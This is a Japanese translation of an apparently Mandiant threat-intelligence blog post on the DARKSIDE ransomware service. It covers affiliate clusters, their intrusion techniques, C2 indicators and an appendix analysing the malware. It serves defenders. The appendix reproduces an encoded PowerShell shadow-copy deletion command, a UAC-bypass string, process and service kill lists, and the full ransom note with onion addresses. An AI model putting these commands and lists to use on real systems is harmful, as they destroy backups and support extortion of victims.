ブログ(脅威調査)

DARKSIDE ランサムウェア・オペレーションのヒント

5月14日更新:Mandiantは、DARKSIDE RaaS運営者がアフィリエイトに共有したと思われる5月13日の発表を複数の攻撃者が引用しているのを確認しました。この発表では、DARKSIDEがブログ、決済、CDNサーバーなどのインフラへのアクセスを失い、サービスを停止するとしています。また、身代金の支払いに応じていない企業に対しても、恐らくアフィリエイトを通じて復号キーを提供するとしています。発表によると、この決定の理由として、法執行機関からの圧力と米国からの圧力を挙げています。私たちはこれらの主張を独自に検証しておらず、出口詐欺である可能性もあるという推測もあります。

背景

2020年8月に初めて登場して以来、DARKSIDEランサムウェアの作成者とその関連組織は、15カ国以上の国や、複数業種に影響を与える世界的な犯罪の展開を開始しました。類似の攻撃同様、この攻撃者はデータ窃取と暗号化によるさまざまな強迫行為を行っており、窃取したデータのロック解除や流出させないかわりに身代金を要求するため、被害者はさらにプレッシャーにさらされることになります。

これらのインシデントの起源は画一的ではありません。DARKSIDEランサムウェアは、組織へのアクセスを提供しランサムウェアを展開する所有者とパートナー、または関連組織間で利益が共有されるransomware-as-a-service (RaaS)として動作しています。Mandiantは現在、このランサムウェアを展開した多数の脅威クラスタを追跡しており、それらにはDARKSIDEを使用する多数の関連組織も含まれています。これらのクラスタは、侵入全体を通して、さまざまなレベルで高度な技術を実証しました。攻撃グループは一般に、オペレーションのさまざまな段階を簡素化するために、一般的に流通している正規ツールに依存していましたが、少なくとも1つの脅威クラスタは、現在パッチが適用されているゼロデイ脆弱性も採用していました。

このブログ投稿の前に、DARKSIDEに関するレポートが、当社の脅威インテリジェンス・プラットフォームの無償版であるMandiant Advantage Freeのユーザーに公開されています。

ターゲティング

Mandiantは、当社のインシデントレスポンス・エンゲージメントおよびDARKSIDEブログのレポートを通じて、複数のDARKSIDE被害者を特定しました。被害者組織のほとんどは、米国に拠点を置いており、金融サービス、法務、製造、プロフェッショナル・サービス、小売、テクノロジーなど、複数の分野にまたがっていました。2020年8月以降、DARKSIDEブログが公表している被害者数は増加していますが、2021年1月に示された被害者数は大幅に減少しています (図1) 。1月の減少は、DARKSIDEを使用した攻撃グループがホリデー・シーズンに活動を休止したことが原因である可能性があります。被害者数の全体的な増加は、複数の関連組織によるDARKSIDEランサムウェア使用の増加を示しています。


図1:既知のDARKSIDE被害者(2020年8月~2021年4月)

DARKSIDEランサムウェア・サービス

2020年11月から、ロシア語の攻撃者「darksupp」は、ロシア語のフォーラムexploit.inとxss.isでDARKSIDE RaaSを宣伝し、2021年4月には「Darkside2.0」RaaSのアップデートを公開しました。このアップデートには、いくつかの新機能と、現在彼らが探しているパートナーやサービスのタイプの説明が含まれています(表1) 。関連組織は、各被害者からの身代金のうち一定割合を享受します。フォーラム広告によると、この割合は50万USドル未満の身代金では25%から、500万USドルを超える身代金では10%に減少します。

このサービスのオペレーターはDARKSIDEランサムウェアの構築を提供するだけでなく、TOR経由でアクセス可能なブログも維持しています。攻撃者は、このサイトを使用して被害者を公開し、これらの組織に対し盗んだデータを公開しない条件での支払いを求めます。アンダーグラウンド・フォーラム広告の最新のアップデートでは、攻撃者が被害者組織にDDoSを試みる可能性があることも示されています。攻撃者darksuppは、関連組織が病院、学校、大学、非営利組織、および公共セクターのエンティティをターゲットにすることは禁止されていると述べています。これは、法施行措置を抑止するための攻撃者による取り組みである可能性があります。これらの分野を標的にすることは、さらなる監視を引き起こしかねないからです。関連組織は、CIS(Commonwealth of Independent States)諸国の組織を標的にすることも禁止されています。

公開日・バージョン

機能/更新

関連レポート

Nov. 10, 2020 (V1)

 

管理パネル内からWindows環境とLinux環境の両方の構築を生成する機能

20-00023273

Salsa20暗号化とRSA-1024公開鍵を使用してファイルを暗号化

クライアントがDarksideの構築、支払い、ブログの記事、被害者とのコミュニケーションを管理するために使用できるTORを介した管理パネルへのアクセス

見せしめにすることで被害者に身代金の支払いを強制するために、クライアントが被害者の情報やアナウンスをDarkside Webサイトに公開できるブログ・セクションを含む管理パネル

April 14, 2021 (V2.0)

 

テストの自動復号化。暗号化から金の回収までが自動化され、サポートに依存しないプロセス

21-00008435

標的に対し有効なDDoS(Layer 3、Layer 7)

パートナーにネットワーク・アクセスを提供し、脆弱性診断スキルを持つ人やチームに提供する要求

表1:DARKSIDE広告スレッドに記載されている注目すべき機能と更新

DARKSIDE関連組織

DARKSIDE RaaSの関連組織に加入するには、面接に合格する必要があります。合格すると、管理パネルへのアクセス権が付与されます(図2)。このパネル内で、関連組織はランサムウェア・ビルドの作成、DARKSIDEブログのコンテンツの指定、被害者の管理、サポートへの連絡など、さまざまなアクションを実行できます。Mandiantは現在まで、DARKSIDEの関連組織であったロシア語を話す攻撃者を少なくとも5組特定しています。これらの攻撃グループの一部の関連広告は、すでに入手しているアクセス権にランサムウェアを配備できる初期アクセス・プロバイダーもしくは攻撃者のどちらかを見つけることを目的としています。DARKSIDEの利用を主張する関係者の中には、BABUKやSODINOKIBI(別名REvil)など、他のRaaS系列プログラムとも提携していると主張する者もいます。これらの攻撃グループの詳細については、Mandiant Advantageを参照してください。


図2:DARKSIDE関連パネル

攻撃ライフサイクル

Mandiantは現在、DARKSIDEの展開に関与した脅威活動の5つのクラスタを追跡しています。未分類の脅威の詳細については、ブログ記事「DebUNCing Attribution: Mandiant による未分類の攻撃者の追跡方法」を参照してください。これらのクラスタは、DARKSIDE RaaSプラットフォームの異なる関連組織である可能性があります。観測されたインシデントを通して、攻撃グループは、悪用後のランサムウェア攻撃における攻撃ライフサイクルのさまざまな段階を簡素化するために、一般に使用される入手可能な正規ツールの数々に依存していました(図表3)。追加のUNCグループのうち3つの詳細は、以下に記載されています。


図3:DARKSIDEランサムウェア・エンゲージメント全体で見られるTTP

UNC2628

UNC2628は、少なくとも2021年2月から活動しています。通常ランサムウェアを2~3日間で展開する攻撃グループであり、その侵入は比較的早く進行します。UNC2628がSODINOKIBI(REvil)やNETWALKERなど、他のRaaSと提携していることを示唆する証拠がいくつかあります。

  • 複数のケースで、インタラクティブな侵入操作が開始される直前に、企業VPNインフラストラクチャに対する疑わしい認証の試みが観察されました。認証パターンは、利用可能なフォレンジック証拠では、UNC2628を前身となる活動に明確に帰属させるには不十分でしたが、パスワード・スプレー攻撃との一貫性がありました。
  • 証拠が残っていたケースにおいて、攻撃グループは正規の認証情報を使用して企業のVPNインフラストラクチャを介し、初期アクセス権を取得していたと思われます。
  • UNC2628は、さまざまな正規アカウントを使用して被害者環境とやり取りしてきましたが、複数のケースで、ユーザー名が'spservice'のドメイン・アカウントも作成、使用しています。UNC2628は、すべての既知の侵入に対して、Cobalt StrikeフレームワークとBEACONペイロードを多用しています。この攻撃者に起因するBEACONコマンド&コントロール(C2) インフラストラクチャには、次のものが含まれています。
    • hxxps://104.193.252[.]197:443/
    • hxxps://162.244.81[.]253:443/
    • hxxps://185.180.197[.]86:443/
    • hxxps://athaliaoriginals[.]com/
    • hxxps://lagrom[.]com:443/font.html
    • hxxps://lagrom[.]com:443/night.html
    • hxxps://lagrom[.]com:443/online.html
    • hxxps://lagrom[.]com:443/send.html
    • hxxps://lagrom[.]com/find.html?key=id#-
  • 少なくともいくつかのケースでは、この攻撃者が認証情報窃取と権限昇格のためにMimikatzを採用したことを示唆する証拠があります。
  • 攻撃グループは、「net」や「ping」などの組み込みコマンドを使って社内ネットワークの基本的な探査を行っているように見えましたが、BEACONを介して追加的な探査が行われており、利用可能なログ・ソースには表示されていない可能性があります。
  • UNC2628は、正規資格情報とCobalt Strike BEACONペイロードを用い、RDPを介してほぼ排他的な環境内で水平展開を行いました。この脅威クラスタは、HTTPS BEACONペイロードとSMB BEACONの両方を使用します。後者は、ほとんどが「\\.\pipe\UIA_PIPE_」で始まる名前付きのパイプを使用します。
  • この脅威クラスタに起因する侵入は、侵入からデータ窃取やランサムウェアの展開へと急速に進み、影響を受ける環境で永続的な足がかりを維持することには重点を置いていませんでした。それにもかかわらず、UNC2628は、正規資格情報の収集、攻撃者制御のドメイン・アカウント(spservice)の作成、およびBEACONを起動することを意図したWindowsサービスの作成を通じてアクセスを維持してきました。特に、UNC2628は'CitrixInit'という名前のサービスでBEACONを繰り返しロードしています。
  • UNC2628は、F-Secure Labsのカスタム・コマンド&コントロール(C3)フレームワークも採用しており、Slack APIを介してプロキシC2コミュニケーションに設定されたリレーを展開しています。この攻撃者の他のTTPに基づいて、Cobalt Strike BEACONトラフィックを難読化するためにC3を使用する可能性がありました。
  • 攻撃グループは、クラウド・ホスティング環境のシステムへのRcloneを使用して、SFTP上でデータを排除しました。Rcloneは、クラウド・ストレージ・アプリケーション用のファイルを管理するためのコマンド・ライン・ユーティリティです。特に、データ除外に使用されるインフラストラクチャは、複数の侵入にわたって再利用されています。あるケースでは、侵入が開始されたその日にデータ除外が実行されました。
  • UNC2628は、PsExecを使用してDARKSIDEランサムウェア暗号化装置を、複数のテキスト・ファイルに含まれるホストのリストに配備します。
  • 攻撃グループは、次のディレクトリを使用し、バックドアのコピー、ランサムウェア・バイナリー、PsExecのコピー、被害者ホストの一覧をその中に配置しました。
    • C:\run\
    • C:\home\
    • C:\tara\
    • C:\Users\[username]\Music\
    • C:\Users\Public

UNC2659

UNC2659は、少なくとも2021年1月から活動しています。私たちは、10日間にわたって攻撃ライフサイクル全体を通して攻撃グループの動きを観察しました。UNC2659は、すでにパッチが適用されているSonicWall SMA100SSL VPN製品のエクスプロイトを使用したことで注目されています。攻撃グループは、攻撃ライフサイクルのさまざまなフェーズに使用されるいくつかのツールを、それらのツールの正規の公開Webサイトから直接ダウンロードしているようでした。

  • 攻撃グループは、SonicWallによってパッチが適用されたSonicWall SMA100SSL VPN製品のエクスプロイトであるCVE-2021-20016を利用して、被害者への初期アクセスに成功しました。攻撃グループがSonicWall VPNで多要素認証オプションを無効にするための脆弱性を使用した可能性があるかもしれませんが、これは確認されていません。
  • 攻撃グループはTeamViewer(TeamViewer_Setup.exe)を活用して、被害者の環境内で持続性を確立しました。利用可能な証拠が示しているのは、攻撃グループが次のURLからTeamViewerを直接ダウンロードし、AnyDeskユーティリティをダウンロードできる場所を参照したということです。
    • hxxps://dl.teamviewer[.]com/download/version_15x/TeamViewer_Setup.exe
  • 攻撃グループはファイル”rclone.exe”をrclone[.]org-hxxps://downloads.rclone[.]org/v1.54.0/rclone-v1.54.0-windows-amd64.zipから直接ダウンロードしているようでした。この攻撃グループは、rcloneを使用して、pCloudクラウドベースのホスティングおよびストレージ・サービスに、数百ギガバイトのデータをSMBプロトコル経由で抽出していたことが確認されています。
  • 攻撃グループは、ファイル”power_encryptor.exe”を被害者環境に配備し、ファイルを暗号化し、SMBプロトコル経由でランサム・ノートを作成しました。
  • Mandiantは、攻撃グループがESXi管理インターフェイスに移動し、ランサムウェア暗号化装置を導入する前にスナップショット機能を無効にしました。これは、いくつかの仮想マシンイメージに影響を与えました。

UNC2465

UNC2465の活動開始日は少なくとも2019年4月にまでさかのぼります。被害者環境にPowerShellベースの.NETバックドアSMOKEDHAMを配布するために、類似したTTPを使用することが特徴です。DARKSIDEが導入されたあるケースでは、数か月単位のギャップがあり、ランサムウェア配備のための初期侵入期間に断続的な活動のみが発生しました。場合によっては、初期アクセスが別の攻撃者によって提供されたことを示している可能性があります。

  • UNC2465は、フィッシングEメールと正規サービスを使用して、SMOKEDHAMバックドアをもたらしました。SMOKEDHAMは、キーロギング、スクリーンショットの取得、任意の.NETコマンドををサポートする.NETバックドアです。1つのインシデントの間、攻撃グループは被害者とのコミュニケーション・ラインを確立する前に、LNKダウンローダーを含むアーカイブを届ける、悪意のあるGoogle Drive リンクを送信しているようでした。より最近のUNC2465は、悪意のあるLNKファイルを含むZIPアーカイブとDropboxリンクを使用しており、実行すると最終的にSMOKEDHAMがシステムにダウンロードされることになります。 
  • UNC2465は、被害者環境内での内部調査や水平展開活動に、Advanced IP Scanner、BLOODHOUND、RDPを使用しています。
  • 攻撃グループは、クレデンシャル・ハーベスティングにMimikatzを使用して、被害者ネットワーク内の権限を昇格させました。
  • UNC2465は、公開されているNGROKユーティリティを使用してファイアウォールをバイパスし、RDPやWinRMなどのリモート・デスクトップ・サービス・ポートをオープン・インターネットに公開します。
  • Mandiantは、DARKSIDEランサムウェアを配備するためにPsExecおよびcronジョブを使用する攻撃グループを確認しました。
  • UNC2465は、被害者のカスタマー・サポートに電話をかけ、データが盗まれたことを伝え、ランサム・ノートのリンクに従うように指示しました。

予想される結果

攻撃グループは、多面的な拡張オペレーションの実施に精通してきており、その成果が、ここ数年間の影響力のあるランサムウェア・インシデントの急速な増大に直接的に貢献したと我々は考えています。ランサムウェアのオペレーターは、被害者が身代金の支払いに黙従する可能性を高めるために設計された追加の拡張戦略を組み込んでいます。たとえば、2021年4月末に、DARKSIDEのオペレーターは、NASDAQや他の株式市場に掲載されている組織を対象としているというプレス・リリースを発表しました。彼らは、発表された侵害の後、株価の低下による潜在的な利益を可能にするために、今後のリークに関する情報を株取引業者に提供する意思があることを示しました。別の注目すべき事例として、攻撃者は被害者のサイバー保険ポリシーを取得し、ポリシーの限界を考慮して身代金の金額を引き下げることを拒否するランサム・ネゴシエーション・プロセス中に、この情報を利用することができました。これにより、ランサムウェア・インシデントの悪用後の段階で、攻撃グループは内部的な調査に関与し、ネゴシエーション能力を高めるためのデータを取得できるようになりました。攻撃グループが被害者にプレッシャーをかけるために使用する恐喝戦術が、2021年を通して進化し続けることが予想されます。

DARKSIDEランサムウェアが複数の攻撃者によって配布されるという証拠に基づき、このランサムウェアに関連するインシデント全体で使用されるTTPは、やや変化し続けることが予想されます。ランサムウェアに対処するためのより包括的な推奨事項については、私たちのブログの記事「ランサムウェアの防御と封じ込め戦略 : エンドポイント保護、セキュリティ強化、封じ込めのための実践的なアドバイス」とホワイト・ペーパーを参照してください。

謝辞

このレポートに著者として掲載されている数名に加え、何百人ものコンサルタント、アナリスト、リバース・エンジニアが、突発的なネック領域への侵入に対処するために必要な業務に徹しながらも、信じられないほど高い分析基準を維持しています。この大きなグループが、私たちのすべての仕事の基礎となっていますが、このレポートの作成に直接貢献したのはより小規模なグループであり、ここに名前を掲載することで感謝を示したいと思います。弊社のAdvanced PracticesチームのBryce AbdoとMatthew Dunwoody、FLAREのJay Smithに特に感謝したいと思います。彼らは分析的な支援と技術的なレビューを提供してくれました。Ioana Teaca、Muhammadumer Khan、Matt Williamsからも素晴らしいサポートをいただきました。

付録A:DARKSIDEランサムウェア分析

DARKSIDEは、Cで書かれたランサムウェアで、固定ディスクとリムーバブル・ディスク、およびネットワーク共有上のファイルを暗号化するように設定できます。DARKSIDE RaaS関連組織は、特定の被害者の構築を作成する管理パネルにアクセスできます。このパネルでは、暗号化モードの選択や、ローカル・ディスクとネットワーク共有を暗号化するかどうかなど、ランサムウェア・ビルドごとにある程度のカスタマイズを行うことができます(図4) 。以下のマルウェア解析は、ファイルMD5: 1a700f845849e573ab3148daef1a3b0bに基づいています。より最近解析されたDARKSIDEサンプルには、以下の大きな違いがあります。

  • C2サーバーへのビーコン・オプションが無効になり、C2サーバーが含まれていた構成エントリが削除されました。
  • マルウェアがサービスとして自分自身を作成して起動する持続的メカニズムが含まれていました。
  • ローカル・ユーザーとしてログオンを試みるために使用された、ハードコードされた被害者の認証情報のセットが含まれていました。盗まれた情報に基づいて取得されたユーザー・トークンが管理トークンで、ドメイン管理者グループの一部である場合、ネットワーク列挙とファイル権限アクセスに使用されます。


図4:管理パネルに表示されるDARKSIDEビルド設定オプション

ホストベースのインジケーター

持続的メカニズム

初期バーションのマルウェアには持続的メカニズムが含まれていませんでした。攻撃者が持続性を求める場合は、外部ツールまたはインストーラーが必要でした。2021年5月に観測されたDARKSIDEバージョンは、マルウェアが自身を作成し起動する持続的メカニズムを、8つの疑似乱数的に定義された小文字16進数 (例:.e98fc8f7) を使って名前を付けたサービス名と詳細を持つサービスとして実装されています。これらは、マルウェアによって作成された他のさまざまな痕跡にも付加されます。この文字列は<ransom_ext>として参照されます。

Service Name: <ransom_ext>
Description: <ransom_ext>

ファイルシステム痕跡

作成ファイル

%CD%\LOG<ransom_ext>.TXT
README<ransom_ext>.TXT
<original_filename_plus_ext><ransom_ext>
May version: %PROGRAMDATA%\<ransom_ext>.ico

レジストリ痕跡

5月に観察されたDARKSIDEバージョンは、以下のレジストリキーを設定します。

HKCR\<ransom_ext>\DefaultIcon\<ransom_ext>\DefaultIcon=%PROGRAMDATA%\<ransom_ext>.ico

詳細

構成

マルウェアは、文字列と設定データの復号化に使用される0x100バイトのキー・ストリームを初期化します。文字列は必要に応じて復号化され、使用後はNULLバイトで上書きされます。マルウェアの設定サイズは0xBE9バイトです。復号化された構成の一部を図5に示します。

00000000  01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000080  95 AA A8 7C 2B 6A D5 12 0E 73 B3 7D BD 16 25 62  •ª¨|+jÕ..s³}½.%b
00000090  A4 A8 BF 19 73 F7 E0 BC DF 02 A8 94 32 CF 0C C0  ¤¨¿.s÷à¼ß.¨"2Ï.À
000000A0  C5 83 0F 14 66 02 87 EE FD 29 96 DF 02 05 C1 12  Ń..f.‡îý)–ß..Á.
000000B0  3E 43 A7 59 E1 F0 C4 5D AE E1 20 2E 77 D9 CA 3C  >C§YáðÄ]®á .wÙÊ<
000000C0  AD C6 BC 84 75 1C E7 0B F0 30 2A 51 13 7A B2 66  .Ƽ„u.ç.ð0*Q.z²f
000000D0  44 73 79 E1 E4 69 C3 CA 1B C1 76 63 65 95 EA CA  DsyáäiÃÊ.Ávce•êÊ
000000E0  F6 10 68 0D CE 36 61 F9 57 B9 19 50 31 D4 E1 70  ö.h.Î6aùW¹.P1Ôáp
000000F0  EC 7B 33 1E 4F 17 E1 80 1D BC CF 8C D8 C5 66 41  ì{3.O.á€.¼ÏŒØÅfA
00000100  E5 0A 00 00 02 6E 01 02 15 03 43 01 8E 24 0E 72  å....n....C.Ž$.r
<cut>

図5:部分的に復号化された構成

サンプルの0x80バイトRSA公開鍵blobはオフセット0x80から始まります。オフセット0x100のDWORD値は64倍され、結果と同等量のメモリが割り当てられます。オフセット0x104から始まる残りのバイトは、PLibで解凍されて割り当てられたバッファに格納されます。解凍されたバイトには、ランサム・ノートと、次のように記述されたマルウェア構成のその他の要素(例:終了プロセス、無視するファイル)が含まれます。解凍された構成の最初の0x60バイトを図6に示します。

00000000  02 01 01 01 00 01 01 00 01 01 01 01 01 01 01 01  ................
00000010  01 01 01 01 01 01 24 00 72 00 65 00 63 00 79 00  ......$.r.e.c.y.
00000020  63 00 6C 00 65 00 2E 00 62 00 69 00 6E 00 00 00  c.l.e...b.i.n...
00000030  63 00 6F 00 6E 00 66 00 69 00 67 00 2E 00 6D 00  c.o.n.f.i.g...m.
00000040  73 00 69 00 00 00 24 00 77 00 69 00 6E 00 64 00  s.i...$.w.i.n.d.
00000050  6F 00 77 00 73 00 2E 00 7E 00 62 00 74 00 00 00  o.w.s...~.b.t...
<cut>

図6:部分的に解凍された構成

図6の最初のバイトは、暗号化モードを示しています。このサンプルは、FASTモードを使用して暗号化するように設定されています。サポートされる値は、次のとおりです。

  • 1: FULL
  • 2: FAST
  • Other values: AUTO

図6のオフセット0x02からオフセット0x15までの個々のバイトは、マルウェアの行動を指示するBoolean値です。マルウェアは、これらの値に基づいて表2に示すアクションを実行します。また、表2に、現在のサンプルで有効または無効になっている機能を示します。

オフセット

有効/無効

説明

0x01


不明

0x02


ローカルディスクの暗号化

0x03


ネットワーク共有の暗号化

0x04


言語チェック実施

0x05


ボリューム・シャドウ・コピーの削除

0x06


ごみ箱を空にする

0x07


セルフ削除

0x08


必要に応じてUACバイパスを実行

0x09


トークン権限の調整

0x0A


ロギング

0x0B


機能は使用されず、次の文字列を復号化

  • https://google.com/api/version
  • https://yahoo.com/v2/api

0x0C


特定のフォルダを無視

0x0D


特定のフォルダを無視

0x0E


特定のファイル拡張子を無視

0x0F


使用されていない機能。以下の文字列に関連
"backup"および"here_backups"

0x10


使用されていない機能。以下の文字列に関連
"sql"と"sqlite"

0x11


プロセスの終了

0x12


サービスの停止

0x13


使用されない機能。繰り返される文字列"blah"を含むバッファに関連

0x14


ランサム・ノートのドロップ

0x15


ミューテックス生成

表2:構成ビット

UACバイパス

マルウェアに昇格された権限がない場合、オペレーティング・システム(OS)のバージョンに基づいて、2つのユーザー・アカウント制御(UAC)のいずれかのバイパスを実行しようとします。OSがWindows10より古い場合、マルウェアはドキュメント化されたslui.exeファイル・ハンドラー・ハイジャック技術を使用します。これには、レジストリ値HKCU\Software\Classes\exe file\shell\open\command\Defaultをマルウェアパスに設定し、-Verb runasを使用して slui.exeを実行します。

OSバージョンがWindows10以降の場合、マルウェアはCMSTPLUA COMインターフェイスを使用するUACバイパスを試みます。この技術の実行には、図7に示す復号化された文字列が使用されます。

Elevation:Administrator!new:
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

図7:復号化されたUACバイパス文字列

暗号化設定

マルウェアは、システム上のMACアドレスに基づいて疑似乱数ファイル拡張子を生成します。2021年5月に観測されたDARKSIDEバージョンでは、MACアドレスではなくシードとしてMachineGuidレジストリ値を使用してファイル拡張子が生成されました。ファイル拡張子は、8つの小文字の16進文字(.e98fc8f7など)で構成され、<ransom_ext>と呼ばれます。ファイル拡張子生成アルゴリズムがPythonで再作成されました。ロギングが有効な場合、マルウェアは現在のディレクトリ内にログ・ファイルLOG<ransom_ext>.TXTを作成します。

マルウェアはコマンド・ライン引数"-path"をサポートしています。これにより、攻撃者は暗号化の対象となるディレクトリを指定できます。

このレポートで分析されたサンプルは、システム言語チェックを実行するように設定されていません。この機能が有効でチェックが成功した場合、「This is a Russian-Speaking System,Exit」という文字列がログ・ファイルに書き込まれ、マルウェアが終了します。

アンチ回復技術

マルウェアは、システム上のごみ箱を検索して空にします。プロセスがWOW64で実行されている場合は、CreateProcessを使用して図8のPowerShellコマンドを実行し、ボリューム・シャドウ・コピーを削除します。

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F7763
6F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

図8:エンコードされたPowerShellコマンド

図4のデコードされたコマンドは、”Get-WmiObject Win32_Shadowcopy|ForEach-Object{$_.Delete();}.” です。マルウェアがWOW64で実行されていない場合、COMオブジェクトとWMIコマンドを使用してボリューム・シャドウ・コピーを削除します。図9の復号化された文字列は、このプロセスを容易にするために使用されます。

root/cimv2
SELECT * FROM Win32_ShadowCopy
Win32_ShadowCopy.ID='%s'

図9:シャドウ・コピーの削除に関連する復号化された文字列

システム操作

図10にリストされている文字列のいずれかを含むサービスの名前はすべて停止され、削除されます。

vss
sql
svc$
memtas
mepocs
sophos
veeam
backup

図10:サービス関連の文字列

2021年5月に観測されたバージョンは、図11にリストされた文字列を含むサービスを停止および削除するように追加で設定されています。

GxVss
GxBlr
GxFWD
GxCVD
GxCIMgr

図11:5月バージョンの追加のサービス関連文字列

図12にリストされている文字列のいずれかを含むプロセス名は終了します。

sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad

図12にリストされている文字列のいずれかを含むプロセス名は終了します。

ファイル暗号化

マルウェアは、その設定に基づいて、固定ディスクとリムーバブル・ディスク、およびネットワーク共有をターゲットにします。プロセスによっては、関連付けられたファイルが正常に暗号化されるように終了する場合があります。ただし、マルウェアは図13に示すプロセスを終了しません。

vmcompute.exe
vmms.exe
vmwp.exe
svchost.exe
TeamViewer.exe
explorer.exe

図13:終了対象外のプロセス

マルウェアは、図14にリストされている文字列を使用して、暗号化プロセス中に特定のディレクトリを無視します。

windows
appdata
application data
boot
google
mozilla
program files
program files (x86)
programdata
system volume information
tor browser
windows.old
intel
msocache
perflogs
x64dbg
public
all users
default

図14:ディレクトリを無視するために使用される文字列

図15にリストされているファイルは無視されます。

$recycle.bin
config.msi
$windows.~bt
$windows.~ws

図15:無視されるファイル

2021年5月に観測されたバージョンは、図16にリストされたファイルを無視するように追加で設定されています。

autorun.inf
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntldrntuser.dat
ntuser.dat
logntuser.ini
thumbs.db

図16:追加の無視されるファイル(5月版)

追加のファイルは、図17にリストされている拡張子に基づいて無視されます。

.386, .adv, .ani, .bat, .bin, .cab, .cmd, .com, .cpl, .cur, .deskthemepack, .diagcab, .diagcfg, .diagpkg, .dll, .drv, .exe, .hlp, .icl, .icns, .ico, .ics, .idx, .ldf, .lnk, .mod, .mpa, .msc, .msp, .msstyles, .msu, .nls, .nomedia, .ocx, .prf, .ps1, .rom, .rtp, .scr, .shs, .spl, .sys, .theme, .themepack, .wpx, .lock, .key, .hta, .msi, .pdb

図17:無視されるファイル拡張子

追加のファイルは、図17にリストされている拡張子に基づいて無視されます。

ランサム・ノート

このマルウェアは、図18に示すランサム・ノートを、通過したディレクトリに書かれたREADME<ransom_ext>.TXTファイルに書き込みます。

----------- [ Welcome to Dark ] ------------->

What happend?
----------------------------------------------
Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.
But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.
Follow our instructions below and you will recover all your data.

Data leak
----------------------------------------------
First of all we have uploaded more then 100 GB data.

Example of data:
 - Accounting data
 - Executive data
 - Sales data
 - Customer Support data
 - Marketing data
 - Quality data
 - And more other...

Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/<REDACTED>
The data is preloaded and will be automatically published if you do not pay.
After publication, your data will be available for at least 6 months on our tor cdn servers.

We are ready:
- To provide you the evidence of stolen data
- To give you universal decrypting tool for all encrypted files.
- To delete all the stolen data.

What guarantees?
----------------------------------------------
We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.
All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.
We guarantee to decrypt one file for free. Go to the site and contact us.

How to get access on website?
----------------------------------------------
Using a TOR browser:
1) Download and install TOR browser from this site: https://torproject.org/
2) Open our website: http://darksidfqzcuhtk2[.]onion/<REDACTED>

When you open our website, put the following data in the input form:
Key:
<REDACTED>

!!! DANGER !!!
DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them.
!!! DANGER !!!

図18:ランサム・ノート

復号文字列

Global\XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
https://google.com/api/version
https://yahoo.com/v2/api
sql
sqlite
$recycle.bin
config.msi
$windows.~bt
$windows.~ws
windows
appdata
application data
boot
google
mozilla
program files
program files (x86)
programdata
system volume information
tor browser
windows.old
intel
msocache
perflogs
x64dbg
public
all users
default
386
adv
ani
bat
bin
cab
cmd
com
cpl
cur
deskthemepack
diagcab
diagcfg
diagpkg
dll
drv
exe
hlp
icl
icns
ico
ics
idx
ldf
lnk
mod
mpa
msc
msp
msstyles
msu
nls
nomedia
ocx
prf
ps1
rom
rtp
scr
shs
spl
sys
theme
themepack
wpx
lock
key
hta
msi
pdb
vmcompute.exe
vmms.exe
vmwp.exe
svchost.exe
TeamViewer.exe
explorer.exe
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad
vss
sql
svc$
memtas
mepocs
sophos
veeam
backup
\r\nblahblahblahblahblahblahblahblahblahblahblahblahblahblahblahblah\r\nblahblahblahblahblahblahbl
ahblahblahblahblahblahblahblahblahblah\r\nblahblahblahblahblahblahblahblahblahblahblahblahblahblah
blahblah\r\nblahblahblah\r\n
\r\n----------- [ Welcome to Dark ] ------------->\r\n\r\nWhat happend?\r\n----------------------------------------------\r\nYour computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.\r\nBut you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.\r\nFollow our instructions below and you will recover all your data.\r\n\r\nData leak\r\n----------------------------------------------\r\nFirst of all we have uploaded more then 100 GB data.\r\n\r\nExample of data:\r\n - Accounting data\r\n - Executive data\r\n - Sales data\r\n - Customer Support data\r\n - Marketing data\r\n - Quality data\r\n - And more other...\r\n\r\nYour personal leak page: http://darksidedxcftmqa[.]onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC\r\nThe data is preloaded and will be automatically published if you do not pay.\r\nAfter publication, your data will be available for at least 6 months on our tor cdn servers.\r\n\r\nWe are ready:\r\n- To provide you the evidence of stolen data\r\n- To give you universal decrypting tool for all encrypted files.\r\n- To delete all the stolen data.\r\n\r\nWhat guarantees?\r\n----------------------------------------------\r\nWe value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.\r\nAll our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.\r\nWe guarantee to decrypt one file for free. Go to the site and contact us.\r\n\r\nHow to get access on website? 